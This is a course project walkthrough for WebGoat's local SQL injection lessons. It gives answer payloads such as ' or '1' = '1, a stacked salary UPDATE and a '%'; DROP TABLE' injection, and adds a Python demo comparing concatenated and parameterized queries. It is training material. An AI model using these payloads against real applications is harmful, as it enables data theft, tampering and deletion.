
Course-End Project

Use WebGoat to Test Web Applications


Project Agenda: Use WebGoat to test web applications for any vulnerabilities and perform a SQL Injection attack

Description: In your new role as a cybersecurity specialist, you will be required to test the
company’s website for any vulnerabilities and to protect the organization from injection
attacks.

For this purpose, you are required to test the web application for SQL injection using WebGoat.

WebGoat is a deliberately insecure application maintained by OWASP, designed to teach
developers to test for vulnerabilities commonly found in web applications that use common and
popular open-source components.

Tools Required: WebGoat VM

Expected Deliverables:

Run the WebGoat web app from your WebGoat VM

Login/Register on the WebGoat web app

Open (A1) Injection -> SQL Injection (Intro) and complete lessons 1 to 13

Steps to be followed:

1. Running the WebGoat application from WebGoat Ubuntu VM

2. Logging in/Registering on the WebGoat web app

3. Opening (A1) Injection -> SQL Injection (Intro) and completing the lessons 1 to 13

Step 1: Running the WebGoat application from WebGoat Ubuntu VM


1.1 Open Firefox web browser on your WebGoat Ubuntu Linux VM and go to the following
URL:

http://127.0.0.1:8080/WebGoat/login

Step 2: Logging in/Registering on the WebGoat web app


2.1 Register and log in as a new user.

2.2 Follow the instructions for each exercise.

Step 3: Opening (A1) Injection -> SQL Injection (Intro) and completing the
lessons 1 to 13

3.1 Click on (A1) Injection -> SQL Injection (Intro) as shown in the following screenshot:

3.2 Open lesson 2, scroll down to the bottom, write the following query and submit:

SELECT department FROM employees WHERE userid=96134


3.3 Following the same steps as in 3.2, submit the following query in lesson 3:

UPDATE employees SET department='Sales' WHERE userid=89762


3.4 Write the following code in lesson 4 and submit:

ALTER TABLE employees ADD phone varchar(20)

3.5 Write the following code in lesson 5 and submit:

3.6 Write the following code in lesson 9 and click on Get Account Info:

' or '1' = '1

Your query was: SELECT * FROM user_data WHERE first_name = 'John' and last_name = '' or '1' = '1'

3.7 Write the following code in lesson 10 and click on Get Account Info:

Login_Count: 0 (any numeric value)

User_id: 0 OR True

Your query was: SELECT * From user_data WHERE Login_Count = 0 and userid= 0 OR True

3.8 Write the following code in lesson 11 and click on Get Department:

Employee Name: A

Authentication TAN: ' or '1' = '1


3.9 Write the following code in lesson 12 and click on Get Department:

Employee Name: A

Authentication TAN: '; UPDATE employees SET salary=99999 WHERE first_name='John


3.10 Open lesson 13, write the following code in the Action contains box, and click on
Search logs:

%'; DROP TABLE access_log;--
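The query shape that lesson 9 echoes back, reproduced against a constructed in-memory SQLite table to show why the `' or '1' = '1` input returns every row when it is concatenated into the statement and no rows when it is bound as a parameter. This is an added Python example, not part of the course project or of WebGoat itself; the table layout and the sample rows are assumptions.

```python
import sqlite3

# Constructed sample data standing in for WebGoat's user_data table (assumption:
# column names follow the query the lesson echoes back; the rows are made up).
SAMPLE_ROWS = [
    (101, "John", "Smith", 3),
    (102, "John", "Doe", 7),
    (103, "Alice", "Jones", 0),
]


def make_db():
    """Build a throwaway in-memory database holding the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user_data (userid INTEGER, first_name TEXT, "
                "last_name TEXT, login_count INTEGER)")
    con.executemany("INSERT INTO user_data VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return con


def lookup_vulnerable(con, last_name):
    """Lesson 9 pattern: the last-name field is spliced into the SQL text,
    so a quote in the input changes the structure of the WHERE clause."""
    sql = ("SELECT * FROM user_data WHERE first_name = 'John' "
           "and last_name = '" + last_name + "'")
    return con.execute(sql).fetchall()


def lookup_parameterized(con, last_name):
    """Mitigation: the value is bound as a parameter, so whatever the user
    types is compared as data and can never alter the statement."""
    sql = "SELECT * FROM user_data WHERE first_name = 'John' and last_name = ?"
    return con.execute(sql, (last_name,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1' = '1"   # the lesson 9 / lesson 11 input shown above
    print("vulnerable, honest input :", len(lookup_vulnerable(db, "Smith")))
    print("vulnerable, payload      :", len(lookup_vulnerable(db, payload)))
    print("parameterized, payload   :", len(lookup_parameterized(db, payload)))
```

With the concatenated query the payload matches all three constructed rows; with the bound parameter it matches none, because no row has a last name literally equal to the payload string.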
